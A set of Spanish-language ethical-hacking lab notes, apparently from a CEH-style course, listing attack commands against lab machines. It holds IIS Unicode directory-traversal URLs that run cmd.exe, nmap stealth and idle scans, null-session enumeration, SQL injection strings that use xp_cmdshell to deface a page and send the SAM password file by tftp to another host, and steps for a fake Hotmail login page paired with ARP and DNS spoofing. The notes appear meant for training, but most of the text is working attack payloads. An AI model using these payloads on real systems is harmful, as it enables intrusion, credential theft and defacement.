Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
45 80 (intro)
HEAD / HTTP/1.0 (intro)
se obtiene la info de el sitio
- probar tambien herramienta gr{afica httprint.
2----------directorio transversal---http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\sql
3----------directorio transversal---http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://10.10.10.229/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\sql
4----------ejemplos nmap (probar en windows y backtrack):
nmap -v -A 10.21.13.21 (-v: verbos -A All todos)
nmap -sS 10.10.10.1 (stealth scan)
nmap -O 10.10.10.1 (os detection)
nmap -sS -O 10.10.10.1 (os detection) (fingerprinting) stealth si funciona con
windows
nmap -sU 10.10.10.1 (udp scan)
nmap -sI 10.10.10.1:1 10.10.10.45 (zombie machine
)
mio: nmap -sI 10.10.10.45:1 10.10.10.71 (checar cool)
escribiendo en archivo
nmap -sS 10.10.10.45 -oA x (genera el archivo x.nmap, -oA indica el formato de
salida , tosho)
lo vemos con
cat x.nmap
scan mas rapido: tcp
mas seguro: idle
5----null session
-enumeracion
null session....contramedida apagar port 139 netbios
windows: C:\>net use \\192.34.34.2\IPC$ "" /u:""
net use \\targetIP\ipc$ "" /u:""
Windows: net use u:
null session con linux
smbclient -L hostName -I targetIP
Linux: $ smbclient \\\\target\\ipc\$ ""
U ""
blah';exec master..xp_cmdshell "echo you-are-defaced > c:\sql\Client.htm" -blah';exec master..xp_cmdshell "tftp -i 10.10.10.155 put c:\winnt\repair\SAM SAM
" -blah';exec master..xp_cmdshell "tftp -i 10.10.10.155 get PageRc.htm c:/sql/Clien
t.htm" -blah';EXEC master..sp_makewebtask "c:\sql\query2.html","select * from sysdatabas
es" -blah';EXEC master..sp_makewebtask "c:\sql\query3.html","select * from juggybank.
information_schema.tables" -7---------------montar un sitio ficticio x para guardar la contrasea de usuario.
practica: se ocupan cehstudent backtrack 4 victima vicktimwin2l
1. sitio ficticio
2. montar sitio
3. probarlo (checar script para guardar lo que esta tecleando el usuario , contr
asea).
4. arp poisonning.
5. DNS poisonning.
router <------------> victima
atacante
servidor montado en ceh student
+envenenamiento arp +dnsspoofing
1. copiar la carpeta de hotmail scripts a c , explicar lo del scrip (version vie
ja).
2. cambiar la carpeta por defecto, habilitar opcion de escribir.
3. permisos de escritura en la parpeta hotmail a IUSR
4. probar el sitio en forma local y de la maquina victima.
***dsniffpackage****
primero: para que no se nos quede ese trafico:
#echo 1 >/proc/sys/net/ipv4/ip_forward
ataque de arpspoof:
de la victima al router
del router a la victima
#arpspoof -i eth0 -t 10.10.10.224 10.10.10.1
de router a la victima
del router a la victima
#arpspoof -i eth0 -t 10.10.10.1 10.10.10.224
creamos el archivo host con pico
editamos